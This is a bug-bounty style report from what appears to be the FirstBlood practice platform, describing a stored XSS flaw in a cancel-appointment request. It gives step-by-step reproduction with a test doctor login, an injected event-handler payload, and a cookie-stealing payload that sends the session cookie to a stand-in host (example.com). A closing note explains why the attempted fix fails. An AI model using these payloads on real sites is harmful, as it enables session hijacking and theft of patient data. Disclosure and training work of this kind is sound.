FirstBlood-#807Stored XSS on /drpanel/index.php by cancelling an appointment
This issue was discovered on FirstBlood v2



On 2021-10-28, 0xblackbird Level 5 reported:

Hello! I can see that the previously reported stored xss is still not fixed. An unauthorized user can escalate his privileges by taking over a doctor account and get access to sensitive data of all registered patients.

Steps to reproduce:

  • First of all, we need to make an appointment in order to cancel one. To do so, navigate to /book-appointment.php, fill in the required fields and click on Book Appointment.

  • Next, copy the UUID and head over to /yourappointments.php. Paste in the UUID in the Appointment ID field and click on Retrieve Appointment.

  • Now click on Cancel and make sure you intercept this request using a proxy interceptor. After that, you'll have to manually append the following POST parameter to the request + the payload: &message="><x/contenteditable/autofocus/onfocusin="confirm%601%60">. Forward the request.

  • We can't see the reflection now because we have to login as a doctor. Luckily, we have a test account that we can also make good use of. Navigate to /login.php?goto=/drpanel/cancelled.php and use the following credentials: testdoctor:test. You'll get redirected to the page where all the cancelled appointments appear. You'll normally now see a confirm box popup.

Escalation:

  • A real attacker doesn't want to display a confirm box and leave. As I described above, he will go for the most impact. In this case, he can steal the doctor's session (by stealing his/her cookies). To do so, we can easily craft a new payload that will redirect the doctor (with his cookies) to a domain controlled by the attacker: "><x/contenteditable/autofocus/onfocusin="document.location.href='//example.com/?cookie='%2Bdocument.cookie">

  • Repeat the previous steps, now only change the previous payload with the one above. You don't have to create and cancel a new appointment, you can just modify the message in the previously cancelled appointment by just re-sending the request.

  • Login as the doctor again and navigate to /drpanel/cancelled.php, you'll get redirected to example.com with the session cookie as the value of the cookie parameter.

Thanks!

Kind regards,
0xblackbird

P2 High

Endpoint: /api/ma.php

Parameter: message

Payload: "><x/contenteditable/autofocus/onfocusin="confirm`1`">


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.